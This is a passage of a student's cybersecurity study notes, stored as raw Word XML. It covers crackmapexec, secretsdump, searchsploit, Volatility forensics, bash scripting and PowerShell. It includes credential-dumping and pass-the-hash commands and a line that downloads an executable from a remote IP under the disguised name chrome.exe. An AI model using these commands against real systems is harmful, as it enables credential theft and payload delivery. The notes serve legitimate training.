      <w:r w:rsidR="000D08C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sudo crackmapexec smb 10.10.10.10 -u administrator -p 123456 --sam – give us the sam file of users and passwords</w:t>
      </w:r>
      <w:r w:rsidR="000D08C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sudo crackmapexec smb 10.10.10.10 -u administrator -H ‘aasa…’  --shares – will use the has</w:t>
      </w:r>
      <w:r w:rsidR="000120D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w:t>
      </w:r>
      <w:r w:rsidR="000D08C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the password for get data on share directories</w:t>
      </w:r>
      <w:r w:rsidR="000D08C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sudo crackmapexec smb 10.10.10.10 -u administrator -p 123456 -x ‘mkdir malware’ – create directory called “malware”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D0B1E0D" w14:textId="63CF967F" w:rsidR="00726FC1" w:rsidRDefault="00726FC1" w:rsidP="003C1974">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 – flag for pass the has instead of password</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-x ‘mkdir malware’ – run command on the remote machine, in this example to create directory</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3C1974" w:rsidRPr="003C197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--sam is used for extracting local account details from the SAM database on individual computers</w:t>
      </w:r>
      <w:r w:rsidR="008110CE">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3C1974" w:rsidRPr="003C197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--ntds</w:t>
      </w:r>
      <w:r w:rsidR="003C197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C1974" w:rsidRPr="003C197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used for extracting domain credentials from Active Directory domain controllers</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--shares – extract info on share directories</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--groups – get data on the groups and the amount of users every group has</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--groups startup – choose specific group, then we will get more data on the startup group</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p w14:paraId="180AAFCD" w14:textId="30ECCA5A" w:rsidR="00360534" w:rsidRDefault="00297646" w:rsidP="009C77E4">
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr>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Impacket-secretsdump -sam SAM.hive -secuirty SECURITY.hive -system SYSTEM.hive local – t</w:t>
      </w:r>
      <w:r w:rsidRPr="0029764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 command extracts hashed passwords and  other sensitive security information</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w:t>
      </w:r>
      <w:r w:rsidRPr="0029764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 uses the SYSTEM hive to decrypt the hashes found in the SAM hive</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w:t>
      </w:r>
      <w:r w:rsidRPr="0029764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 can also extract and decrypt LSA Secrets if they are accessible within the SECURITY hive</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B685FBE" w14:textId="050487CB" w:rsidR="00F833E7" w:rsidRDefault="00F833E7" w:rsidP="0034059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searchsploit vsftpd – search all the exist exploits of vsftpd service in the DB exploit</w:t>
      </w:r>
      <w:r w:rsidR="00093FD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searchsploit -m 17491 – download the exploit file 17491 to our machine.</w:t>
      </w:r>
      <w:r w:rsidR="001418A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python 4957.py 10.10.10.10 – use the exploit 4957.py in the target 10.10.10.10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68DBBF25" w14:textId="77777777" w:rsidR="00697594" w:rsidRDefault="00697594" w:rsidP="0034059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45AB629" w14:textId="6EEB9082" w:rsidR="00601862" w:rsidRPr="000C387E" w:rsidRDefault="00601862" w:rsidP="00601862">
      <w:pPr>
        <w:jc w:val="center"/>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Volatality commands in windows/linux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76388DC3" w14:textId="224F99B6" w:rsidR="00601862" w:rsidRPr="00A80D19" w:rsidRDefault="00601862" w:rsidP="00EA6EB0">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Volatality - this tool can be used in windows and linux, the difference is vol.exe or ./vol</w:t>
      </w:r>
      <w:r w:rsidR="0098268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we used volatality 2.5 and 3</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Vol.exe -f memdump.mem imageinfo – get the OS (found in profile), we have to get that for the next commands.</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vol.exe -f memdump.mem </w:t>
      </w:r>
      <w:r w:rsidR="00933DDE">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profile=winxpsp2 pstree</w:t>
      </w:r>
      <w:r w:rsidR="00933DDE">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get the processes in </w:t>
      </w:r>
      <w:r w:rsidR="00933DDE" w:rsidRPr="00933DDE">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hierarchy</w:t>
      </w:r>
      <w:r w:rsidR="00933DDE">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./vol -f memdump.mem --profile=winxpsps2 pslist – print the procceses</w:t>
      </w:r>
      <w:r w:rsidR="00933DDE">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5C509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./vol -f memdump.mem --profile=winxpsps2 mftparser – shows all the mft table</w:t>
      </w:r>
      <w:r w:rsidR="003E0F5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./vol -f memdump.mem --profile=winxpsps2 printkey -K “SAM\Domains\Account\Users\Names” – output all the users</w:t>
      </w:r>
      <w:r w:rsidR="003E0F5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A2570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./vol -f memdump.mem --profile=winxpsps2 connscan – shows all the connection that’s has been on the computer</w:t>
      </w:r>
      <w:r w:rsidR="00A2570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./vol -f memdump.mem --profile=winxpsps2 connections – shows all the connections that wa active when the memory has been take</w:t>
      </w:r>
      <w:r w:rsidR="003907B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00B7689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./vol -f memdump.mem --profile=winxpsps2 cmdline\dlllist -p 788 – shows the path of the process</w:t>
      </w:r>
      <w:r w:rsidR="00B7689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./vol -f memdump.mem --profile=winxpsps2 hivelist</w:t>
      </w:r>
      <w:r w:rsidR="005017A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print a list of all the registries</w:t>
      </w:r>
      <w:r w:rsidR="008D2D4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./vol -f dump2.mem –profile=vistasp1x86 hashdump – print the hashes of the users.</w:t>
      </w:r>
      <w:r w:rsidR="0098268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volatality 3 – a lil difference syntax</w:t>
      </w:r>
      <w:r w:rsidR="0098268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./vol.py -f m4.vmem windows.info – output profile, as imageinfo on vol 2.5</w:t>
      </w:r>
      <w:r w:rsidR="0098268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./vol.py -f m4.vmem windows.pslist – show  processes</w:t>
      </w:r>
      <w:r w:rsidR="0098268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./vol.py -f m4.vmem windows.netscan.NetScan – shows connections</w:t>
      </w:r>
      <w:r w:rsidR="0098268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./vol.py -f m4.vmem windows.envas – show computer name</w:t>
      </w:r>
      <w:r w:rsidR="0098268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./vol.py -f m4.vmem windows.filescan – show a lot of paths of files, and its offsets</w:t>
      </w:r>
      <w:r w:rsidR="0098268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./vol.py -f m4.vmem windows.dumpfiles --virtaddr 0x808 – extract a file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="386D12BE" w14:textId="77777777" w:rsidR="00A80D19" w:rsidRPr="00933DDE" w:rsidRDefault="00A80D19" w:rsidP="00C30858">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D6CFD8D" w14:textId="77777777" w:rsidR="0094127D" w:rsidRDefault="0094127D" w:rsidP="00C30858">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CBFBA3C" w14:textId="77777777" w:rsidR="009C77E4" w:rsidRDefault="009C77E4" w:rsidP="00C30858">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688907D" w14:textId="77777777" w:rsidR="009C77E4" w:rsidRDefault="009C77E4" w:rsidP="00C30858">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CE31F6A" w14:textId="41A9147F" w:rsidR="0094127D" w:rsidRPr="000C387E" w:rsidRDefault="0094127D" w:rsidP="0094127D">
      <w:pPr>
        <w:jc w:val="center"/>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Geany</w:t>
      </w:r>
      <w:r w:rsidRPr="00A716BA">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syntax</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19709963" w14:textId="588FFB65" w:rsidR="00670C38" w:rsidRPr="00670C38" w:rsidRDefault="00670C38" w:rsidP="00670C38">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#!/bin/bash – the first line in bash scipt, called shebang</w:t>
      </w:r>
      <w:r w:rsidR="00586BF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chmod +x file.sh – for we could run the script</w:t>
      </w:r>
      <w:r w:rsidR="000D38A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./file.sh – run the script</w:t>
      </w:r>
      <w:r w:rsidR="000D38A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bash file.sh – run the script</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1468EBFB" w14:textId="7FD96049" w:rsidR="0052648E" w:rsidRDefault="00670C38" w:rsidP="0052648E">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echo “enter a name”</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read answer</w:t>
      </w:r>
      <w:r w:rsidR="001A6FC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get input </w:t>
      </w:r>
      <w:r w:rsidR="003C2A9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read -p “enter a name: ” name – shortcut of echo and read in the same line</w:t>
      </w:r>
      <w:r w:rsidR="001A6FC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read -s answer – get input without seeing on the screen</w:t>
      </w:r>
      <w:r w:rsidR="00D87A1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echo -e “1. Asdasd\n2. asdawd” – for using special characters as \n</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echo “hello $answer” – using the variable, pay attention, </w:t>
      </w:r>
      <w:r w:rsidR="00D87A1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use </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not  ‘</w:t>
      </w:r>
      <w:r w:rsidR="0062085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ip=$(cat erel.txt | awk ‘{print $NF}’) – insert a value to variable</w:t>
      </w:r>
      <w:r w:rsidR="001D0E2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space is must not</w:t>
      </w:r>
      <w:r w:rsidR="00B9530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location = $(pwd) – accumulate the current path</w:t>
      </w:r>
      <w:r w:rsidR="00F344AA">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$number = $((number + count)) – syntax of sum of 2 numbers </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47BA59AB" w14:textId="7EC0E767" w:rsidR="0052648E" w:rsidRDefault="0052648E" w:rsidP="00E33098">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function WHOIS()</w:t>
      </w:r>
      <w:r w:rsidR="00E3309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echo ”hello”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40F4B238" w14:textId="43B0D5EF" w:rsidR="0052648E" w:rsidRDefault="0052648E" w:rsidP="0052648E">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WHOIS</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the syntax for function, you have to remember to call the function.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CD0EEEE" w14:textId="77777777" w:rsidR="00CF33F1" w:rsidRDefault="0052648E" w:rsidP="00CF33F1">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 “$answer” == “y” ]</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then</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echo “ok, bye”</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else</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echo “wrong input”</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fi</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syntax of if, you have to put fi in the end, you have to write then line after if,</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you can compare strings in ==</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72D6A5B3" w14:textId="77777777" w:rsidR="00EE1783" w:rsidRDefault="00CF33F1" w:rsidP="00EE1783">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 “$name” == “” ] – check if the variable is empty</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50ED1DEF" w14:textId="052D92E6" w:rsidR="00CC2CFA" w:rsidRDefault="00CC2CFA" w:rsidP="00CC2CFA">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2CFA">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grep -q '[^[:space:]]' "$first_location "</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check if the file contains anything then space (to check if the file is empty of content)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E6C7BA7" w14:textId="4572672E" w:rsidR="00987E1B" w:rsidRDefault="00987E1B" w:rsidP="00CC2CFA">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 -d “/home/kali/results” ] – check if the directory exist then, else …</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="248537FE" w14:textId="32F5853E" w:rsidR="00233685" w:rsidRDefault="00233685" w:rsidP="00987E1B">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 -f “$path” ] – get as input file path and check if exist then, else…</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72D05EA7" w14:textId="77777777" w:rsidR="00987E1B" w:rsidRDefault="00987E1B" w:rsidP="00987E1B">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30E2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 "$country" != "IL" ] &amp;&amp; [ "$country" != "" ]</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check the country is not israel and use &amp;&amp; for two statemnets</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="534DA8BF" w14:textId="51F90EDA" w:rsidR="0052648E" w:rsidRDefault="00987E1B" w:rsidP="0052648E">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7E1B">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 "$check_if_anonymous" -eq 0 ]</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syntax to compare to number</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="303805E4" w14:textId="206C67F2" w:rsidR="0017417B" w:rsidRPr="00987E1B" w:rsidRDefault="0017417B" w:rsidP="0017417B">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417B">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 "${var,,}" == "yes" ]]</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the var variable converted to low characters before comparison</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21A1B387" w14:textId="4219EE05" w:rsidR="00930780" w:rsidRDefault="00930780" w:rsidP="0052648E">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whois $ip – using whois tool to search about this ip</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geoiplookup $ip – using geoiplookup tool to search about this ip</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75D4AB7F" w14:textId="7D9AB174" w:rsidR="00892789" w:rsidRDefault="00892789" w:rsidP="0052648E">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figlet “my project” – basic animation for beauty headline</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51BE04B2" w14:textId="3CB1646B" w:rsidR="00FD41BF" w:rsidRDefault="00FD41BF" w:rsidP="0052648E">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sleep 2 – wait 2 seconds before continue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34173CD5" w14:textId="2C0F6ECC" w:rsidR="00EB2E07" w:rsidRDefault="00EB2E07" w:rsidP="00EB2E07">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case $number in</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1)</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nmap $ip -sV</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2) nmap $ip -Pn</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echo “wrong input”</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esac</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syntax of case, the $number is a number to insert one of the cases, *) is for every number that not one of the numbers like 1 or 2 in this case dunction, esac enclose the case.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28D5DED2" w14:textId="77777777" w:rsidR="004456B5" w:rsidRDefault="004456B5" w:rsidP="00EB2E07">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1FE4022" w14:textId="77777777" w:rsidR="004456B5" w:rsidRDefault="004456B5" w:rsidP="00EB2E07">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E6797C7" w14:textId="1DB60CB9" w:rsidR="004456B5" w:rsidRDefault="00D15AE0" w:rsidP="004456B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5AE0">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:noProof/>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6C12DCC3" wp14:editId="5DB8EE59">
            <wp:extent cx="5274310" cy="1688465"/>
            <wp:effectExtent l="0" t="0" r="2540" b="6985"/>
            <wp:docPr id="714988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988331" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId10"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5274310" cy="1688465"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="002D35E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syntax for using array, and installing packages, -s for check if the package exist,</w:t>
      </w:r>
      <w:r w:rsidR="002D35E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if not, it install the package and sign -y automatically for the question if to install.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79D578C8" w14:textId="46065015" w:rsidR="00233685" w:rsidRDefault="00233685" w:rsidP="004456B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Y=0 – define a numerical variable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3806268D" w14:textId="006476DC" w:rsidR="00CC796D" w:rsidRDefault="00CC796D" w:rsidP="00CC796D">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0D1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&gt;/dev/null 2&gt;&amp;1</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delete all the output from the command, pay attention it will work only if you will put it in the right places, in the end of command before grep and more commands.</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2&gt;/dev/null – will not print error, could use to hide logo tools (as volatality)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02E8F7EC" w14:textId="2B0DECA8" w:rsidR="00CF33F1" w:rsidRDefault="00CF33F1" w:rsidP="00CC796D">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Filename=$(basename “$path”) – get full path and extract the name of the file inside the variable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74ED5B59" w14:textId="638BC069" w:rsidR="00730659" w:rsidRDefault="00D924ED" w:rsidP="00CC796D">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24E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extension="${filename##*.}"</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3065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 the name of file and extract the name of the extension</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ED6E857" w14:textId="0A84234C" w:rsidR="00730659" w:rsidRDefault="00730659" w:rsidP="00CC796D">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&gt; asd.txt – creates an empty file and override if already exist</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C7B6F58" w14:textId="48F9C586" w:rsidR="00596447" w:rsidRDefault="00596447" w:rsidP="00CC796D">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644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start_seconds=$(date -d "$start_time" +%s)</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get the current time in epoch time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000AED10" w14:textId="77777777" w:rsidR="00CE3331" w:rsidRDefault="00CE3331" w:rsidP="00CC796D">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6638434" w14:textId="3C9C22D5" w:rsidR="00D8498F" w:rsidRDefault="00CE3331" w:rsidP="00CE3331">
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:rFonts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3331">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>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b/>
      </w:r>
      <w:r w:rsidR="00D8498F" w:rsidRPr="00D8498F">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:noProof/>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4CF1200B" wp14:editId="0F7A2B22">
            <wp:extent cx="6237515" cy="1607066"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="14398343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834320" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId11"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6268583" cy="1615071"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AABC8FD" w14:textId="7555F486" w:rsidR="00CE3331" w:rsidRDefault="00CE3331" w:rsidP="00CE3331">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the syntax of the for loop is to take info on ip by using tools like nmap and masscan, by using &amp; in the end of the loop, it is does the scanning on all the ips in the list simultaneously and save time, by wait command, it wait for the process to end before continue to the next command s in the automation, by timeout 30 , it limit the scan for 30 seconds, by using ${ip}_nmap.txt it know to refer to the ip variable and not search for ip_nmap variable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4166AC3A" w14:textId="77777777" w:rsidR="00CF33F1" w:rsidRDefault="00CF33F1" w:rsidP="00CC796D">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EE17206" w14:textId="77777777" w:rsidR="005578F8" w:rsidRDefault="005578F8" w:rsidP="00CC796D">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9A45D5F" w14:textId="77777777" w:rsidR="005578F8" w:rsidRDefault="005578F8" w:rsidP="00CC796D">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A97EF9C" w14:textId="77777777" w:rsidR="00F36876" w:rsidRDefault="00F36876" w:rsidP="004456B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87EA233" w14:textId="77777777" w:rsidR="009C77E4" w:rsidRDefault="009C77E4" w:rsidP="004456B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27EB742" w14:textId="77777777" w:rsidR="009C77E4" w:rsidRDefault="009C77E4" w:rsidP="004456B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048E241" w14:textId="77777777" w:rsidR="009C77E4" w:rsidRDefault="009C77E4" w:rsidP="004456B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CAF076E" w14:textId="77777777" w:rsidR="009C77E4" w:rsidRDefault="009C77E4" w:rsidP="004456B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E384428" w14:textId="77777777" w:rsidR="009C77E4" w:rsidRDefault="009C77E4" w:rsidP="004456B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BFABA7A" w14:textId="77777777" w:rsidR="009C77E4" w:rsidRDefault="009C77E4" w:rsidP="004456B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09EB7E9" w14:textId="77777777" w:rsidR="009C77E4" w:rsidRDefault="009C77E4" w:rsidP="004456B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0B57E7B" w14:textId="77777777" w:rsidR="009C77E4" w:rsidRDefault="009C77E4" w:rsidP="004456B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D65864C" w14:textId="77777777" w:rsidR="009C77E4" w:rsidRDefault="009C77E4" w:rsidP="004456B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95D28F8" w14:textId="77777777" w:rsidR="009C77E4" w:rsidRDefault="009C77E4" w:rsidP="004456B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8BB0E06" w14:textId="77777777" w:rsidR="009C77E4" w:rsidRDefault="009C77E4" w:rsidP="004456B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4357C26" w14:textId="77777777" w:rsidR="009C77E4" w:rsidRDefault="009C77E4" w:rsidP="004456B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C45B233" w14:textId="77777777" w:rsidR="009C77E4" w:rsidRDefault="009C77E4" w:rsidP="004456B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CBA9C7D" w14:textId="77777777" w:rsidR="009C77E4" w:rsidRDefault="009C77E4" w:rsidP="004456B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5066DCC" w14:textId="77777777" w:rsidR="009C77E4" w:rsidRDefault="009C77E4" w:rsidP="004456B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ED69607" w14:textId="77777777" w:rsidR="009C77E4" w:rsidRDefault="009C77E4" w:rsidP="004456B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84B8F07" w14:textId="7322EB1A" w:rsidR="00F36876" w:rsidRPr="000C387E" w:rsidRDefault="00F36876" w:rsidP="00F36876">
      <w:pPr>
        <w:jc w:val="center"/>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Powershell </w:t>
      </w:r>
      <w:r w:rsidRPr="00A716BA">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commands</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F66CB5D" w14:textId="6AE5C162" w:rsidR="002F60DB" w:rsidRDefault="00F613E9" w:rsidP="00FF6A8D">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hostname - </w:t>
      </w:r>
      <w:r w:rsidRPr="00F613E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returns the network name of the current computer</w:t>
      </w:r>
      <w:r w:rsidR="0047598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475987" w:rsidRPr="00B97BF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Out-GridView</w:t>
      </w:r>
      <w:r w:rsidR="0047598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underrated command for open the ouput in comfortable GUI and use text manipulation, recommended when need to deal with the same output for a while</w:t>
      </w:r>
      <w:r w:rsidR="006A792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Get-ChildItem – get all the items (files and directories) in my current location</w:t>
      </w:r>
      <w:r w:rsidR="00C95C6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Get-ChildItem | measure – counts the items (similar to wc -l)</w:t>
      </w:r>
      <w:r w:rsidR="00FF6A8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Get-Location – show my current location (similar to pwd)</w:t>
      </w:r>
      <w:r w:rsidR="00B77A3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B77A37" w:rsidRPr="00B77A3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Get-FileHash .\.node_repl_history -Algorithm md5</w:t>
      </w:r>
      <w:r w:rsidR="00B77A3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get md5 hash of a file</w:t>
      </w:r>
      <w:r w:rsidR="0069795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Get-Command -commandtype cmdlet – show all the cmdlet commands</w:t>
      </w:r>
      <w:r w:rsidR="005578F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Get-Command -name “*invoke*” – find all the commands that contains the string “invoke”</w:t>
      </w:r>
      <w:r w:rsidR="004E721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Get-Help Invoke-Webrequest -examples – will show examples of use this command</w:t>
      </w:r>
      <w:r w:rsidR="002F60DB">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Get-Alias cd – show the parallel command in powershell</w:t>
      </w:r>
      <w:r w:rsidR="008A0F7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Get-Content auth.log – get the content of the file (similar to cat)</w:t>
      </w:r>
      <w:r w:rsidR="00024C4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Get-Content auth.log | Select-Object -Index 994 – get line 995 from the file (count from 0)</w:t>
      </w:r>
      <w:r w:rsidR="00C874E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Get-Date – get the current date</w:t>
      </w:r>
      <w:r w:rsidR="001C524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1C5241" w:rsidRPr="001C524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Get-NetTCPConnection</w:t>
      </w:r>
      <w:r w:rsidR="001C524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show data on</w:t>
      </w:r>
      <w:r w:rsidR="00EE297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TCP</w:t>
      </w:r>
      <w:r w:rsidR="001C524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ports </w:t>
      </w:r>
      <w:r w:rsidR="00EE297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w:t>
      </w:r>
      <w:r w:rsidR="001C524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machine</w:t>
      </w:r>
      <w:r w:rsidR="00EF3DD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EF3DD2" w:rsidRPr="00EF3DD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Get-NetUDPEndpoint</w:t>
      </w:r>
      <w:r w:rsidR="00EF3DD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show data on UDP ports (it is not called connections cause in UDP there is not 3-way handshake, meaning there is not process of connection)</w:t>
      </w:r>
      <w:r w:rsidR="00220C1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220C1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B97BF5" w:rsidRPr="00B97BF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Get-ChildItem . -Recurse | Get-FileHash -Algorithm MD5 | Out-GridView</w:t>
      </w:r>
      <w:r w:rsidR="00B97BF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get all the files recursively (also those inside the directories) from you location, find their md5 hash and open GUI to see the output, and filter the output in more comfortable way.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FB3D4EC" w14:textId="0420F86A" w:rsidR="002C5B72" w:rsidRDefault="002C5B72" w:rsidP="00F613E9">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5B7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Get-ChildItem -File | Sort-Object Length -Descending | Select-Object -First 1</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 only the file in my current location then sort them by length in descending order, and output the first</w:t>
      </w:r>
      <w:r w:rsidR="00A47F1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-File – show only files</w:t>
      </w:r>
      <w:r w:rsidR="00A47F1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-Directory – show only directories</w:t>
      </w:r>
      <w:r w:rsidR="00A47F1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-Recurse – search recursively (inside directories)</w:t>
      </w:r>
      <w:r w:rsidR="00A47F1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-Name – search by name</w:t>
      </w:r>
      <w:r w:rsidR="008E755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Sort-Object length -Descending – sort all the objects by length in Descending order</w:t>
      </w:r>
      <w:r w:rsidR="008E755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Select-Object -First 1 – output only the first one</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F828776" w14:textId="5E9FF2B4" w:rsidR="008E6B86" w:rsidRDefault="007B0372" w:rsidP="009775E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B037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Get-ChildItem -Recurse -File -Filter "auth.log" | Select-Object Mode, LastWriteTime, Length, Name, FullName</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search recursively the auth.log file and show only info on it as </w:t>
      </w:r>
      <w:r w:rsidR="00B1107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path and more</w:t>
      </w:r>
      <w:r w:rsidR="00B1107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-Filter – search for the name of the file</w:t>
      </w:r>
      <w:r w:rsidR="00BD434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Fullname – full path for the file</w:t>
      </w:r>
      <w:r w:rsidR="00B1107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LastWriteTime – the last time the file was changed</w:t>
      </w:r>
      <w:r w:rsidR="00BD434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Length – the size of the file </w:t>
      </w:r>
      <w:r w:rsidR="00BD434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5000CB">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Get-Process – show all the processes and show stats</w:t>
      </w:r>
      <w:r w:rsidR="009775E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9775E5" w:rsidRPr="009775E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Get-Process | sort -Property cpu</w:t>
      </w:r>
      <w:r w:rsidR="009775E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sort all the processes by cpu column</w:t>
      </w:r>
      <w:r w:rsidR="00AC4B7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AC4B75" w:rsidRPr="009775E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sort -Property</w:t>
      </w:r>
      <w:r w:rsidR="00AC4B7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cpu – sort by column cpu</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7566321D" w14:textId="77777777" w:rsidR="00CC6C94" w:rsidRDefault="008E6B86" w:rsidP="009775E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6B8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Get-Process | Where-Object{$_.ProcessName -eq "lsass"}</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get the line of the process named lsass (by the column ProcessName)</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8E6B8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Get-Process | Where-Object{$_.ProcessName -eq "lsass"} | Select-Object Name,Path</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extract only the properties name and path of the process lsass</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F0F7EB9" w14:textId="2DC7C0D2" w:rsidR="00B64404" w:rsidRDefault="00B64404" w:rsidP="00D372E2">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Get-AD… - </w:t>
      </w:r>
      <w:r w:rsidRPr="00B6440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 need to have the Active Directory module installed</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B6440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Relative Identifier (RID) is part of the security identifier (SID)</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B6440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Get-ADUser</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find RID of the user</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Get-ADGroup – find RID of the group</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Get-ADUser donna </w:t>
      </w:r>
      <w:r w:rsidR="00D372E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372E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find the RID of the user donna</w:t>
      </w:r>
      <w:r w:rsidR="00D372E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D372E2" w:rsidRPr="00D372E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Get-ADUser -Filter * | Where-Object { $_.SID.Value -match '-501$' }</w:t>
      </w:r>
      <w:r w:rsidR="00D372E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from all the ADUsers its find the one with RID 501</w:t>
      </w:r>
      <w:r w:rsidR="00E7040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Get-ADUser -Filter * -Properties PasswordLastSet – shows the last time the password</w:t>
      </w:r>
      <w:r w:rsidR="009D4D4B">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was</w:t>
      </w:r>
      <w:r w:rsidR="00E7040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set</w:t>
      </w:r>
      <w:r w:rsidR="00B01DEA">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Get-ADComputer -filter * - show all the computers in the domain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7969441C" w14:textId="77777777" w:rsidR="00CC6C94" w:rsidRDefault="00CC6C94" w:rsidP="009775E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Get-Service – get all the services and their status</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="049EAC90" w14:textId="77777777" w:rsidR="00FE275B" w:rsidRDefault="00CC6C94" w:rsidP="009775E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Get-volume – get data on hard disks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B6580D9" w14:textId="55A819DF" w:rsidR="00D85A07" w:rsidRDefault="00D85A07" w:rsidP="009775E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5A0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Get-ExecutionPolicy</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show my policy</w:t>
      </w:r>
      <w:r w:rsidR="00531FC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levels between restricted to </w:t>
      </w:r>
      <w:r w:rsidR="005E628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bypass</w:t>
      </w:r>
      <w:r w:rsidR="001E4F2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5 levels</w:t>
      </w:r>
      <w:r w:rsidR="00531FC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531FC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5E628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bypass</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means every script can run</w:t>
      </w:r>
      <w:r w:rsidR="005E628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it does not even alert the user</w:t>
      </w:r>
      <w:r w:rsidR="005E628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unrestricted means every script can run, but it d</w:t>
      </w:r>
      <w:r w:rsidR="003728BE">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oes prompt the user</w:t>
      </w:r>
      <w:r w:rsidR="005E628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31FC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restricted means no scripts are allowed to run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10DF3F34" w14:textId="5C42A07C" w:rsidR="00495A6E" w:rsidRPr="00BB17D9" w:rsidRDefault="00495A6E" w:rsidP="00BB17D9">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Get-WinEvent -Path .\log.evtx – read event file</w:t>
      </w:r>
      <w:r w:rsidR="00BB17D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(only the name of the event)</w:t>
      </w:r>
      <w:r w:rsidR="00BB17D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Get-WinEvent -Path .\log.evtx | Format-List – read the event file with the content of every event</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="564EB194" w14:textId="77777777" w:rsidR="00FE275B" w:rsidRDefault="00FE275B" w:rsidP="00FE275B">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Set-Location favorites – go inside favorites directory (similar to cd)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F35FCAC" w14:textId="52F7AB2A" w:rsidR="00045548" w:rsidRPr="00045548" w:rsidRDefault="00045548" w:rsidP="00045548">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54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Select-String </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auth.log</w:t>
      </w:r>
      <w:r w:rsidRPr="0004554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-Pattern 140.206.157.242 | Measure-Object</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counts the amount of times th</w:t>
      </w:r>
      <w:r w:rsidR="007B255B">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 ip show in the file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1917E50C" w14:textId="77777777" w:rsidR="00FE275B" w:rsidRDefault="00FE275B" w:rsidP="00FE275B">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Invoke-Webrequest -Uri </w:t>
      </w:r>
      <w:hyperlink r:id="rId12" w:history="1">
        <w:r w:rsidRPr="001F3576">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>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http://10.10.10.10:1212/chrome_update.exe</w:t>
        </w:r>
      </w:hyperlink>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-outfile c:\users\...\chrome.exe – ask from the ip 10.10.10.10 in port 1212 (the port need to be open already) the file chrome_update.exe and name it as chrome.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44D74C44" w14:textId="77777777" w:rsidR="00061C0E" w:rsidRDefault="00A625A1" w:rsidP="00A625A1">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Ping 8.8.8.8 – check the connection with 8.8.8.8 ip</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A625A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Test-Connection -ComputerName 8.8.8.8</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check the connection, but return more info then ping</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A625A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Test-NetConnection -ComputerName 8.8.8.8</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return more info on the connection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11D235AB" w14:textId="20FDFCFF" w:rsidR="00FE275B" w:rsidRDefault="00061C0E" w:rsidP="000E6152">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1C0E">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Write-Host</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Pr="00061C0E">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used for displaying information directly to the console</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you cant save info with that command into a variable or file</w:t>
      </w:r>
      <w:r w:rsidR="000E615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0E6152" w:rsidRPr="008F37C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Write-Host "Hello"</w:t>
      </w:r>
      <w:r w:rsidR="000E615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print hello</w:t>
      </w:r>
      <w:r w:rsidR="000E615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Write-Output – print the data, also enable us to save the info inside a file or variable</w:t>
      </w:r>
      <w:r w:rsidR="00A625A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061C0E">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Write-Output</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E615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“hello</w:t>
      </w:r>
